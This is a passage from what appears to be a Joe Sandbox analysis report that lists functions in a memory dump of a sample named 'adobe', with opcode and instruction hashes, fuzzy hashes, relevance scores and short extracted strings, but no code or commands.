                                                  • Opcode Fuzzy Hash: 8543b0110ad27a74d9ceb4a168d19447bcc9ce43553e4694793d9cbfbd783609
                                                  • Instruction Fuzzy Hash: 23F18330B00209CFDB58EFA5D554A6EB7B6FF84300F2585A9D805AB3A9DB75DC42CB90
                                                  Function 06758418 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: 75a758db849b7cbc9d4a00b49c57ed4c4ec03323a4a839e257ed2a8851137c69
                                                  • Instruction ID: 671189b28a3c7f47605e1a95b9b4d26857822a35f9e88931173d25c7c120575f
                                                  • Opcode Fuzzy Hash: 75a758db849b7cbc9d4a00b49c57ed4c4ec03323a4a839e257ed2a8851137c69
                                                  • Instruction Fuzzy Hash: F7B15D30E00219CFDB54EFA8D584A6EB7F6EF84304F258869D805AB356DB75DC82CB91
                                                  Function 06758830 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR]q$LR]q$$]q$$]q
                                                  • API String ID: 0-3527005858
                                                  • Opcode ID: c686ddd6624f2f1468ca62b695e7cbc2b2ef885e75daf05a0c78b6b3e48006bc
                                                  • Instruction ID: c28baeec11e752d54474125ac964ebe9f30fbc3ec8154000176e9e564df603f5
                                                  • Opcode Fuzzy Hash: c686ddd6624f2f1468ca62b695e7cbc2b2ef885e75daf05a0c78b6b3e48006bc
                                                  • Instruction Fuzzy Hash: 6851D530B002159FDB58EF28D850A7A77F6FF89304F1585A9E8069B3A5DB71EC41CB92
                                                  Function 0675AD08 Relevance: 5.2, Strings: 4, Instructions: 166COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4499943228.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6750000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: 9110d85c7dd9cc560a44cce6795861323bf8fbc37b4fbb5d2c9a252c709993b5
                                                  • Instruction ID: dc50cefd5cccb38b40313d41a94878d0d097c37d6240107de63282cbe74ed3af
                                                  • Opcode Fuzzy Hash: 9110d85c7dd9cc560a44cce6795861323bf8fbc37b4fbb5d2c9a252c709993b5
                                                  • Instruction Fuzzy Hash: CB51A330E102048FDFA5EB64D581A6D77B6EF45301F2686B9DC05E7259DB71DC42CB90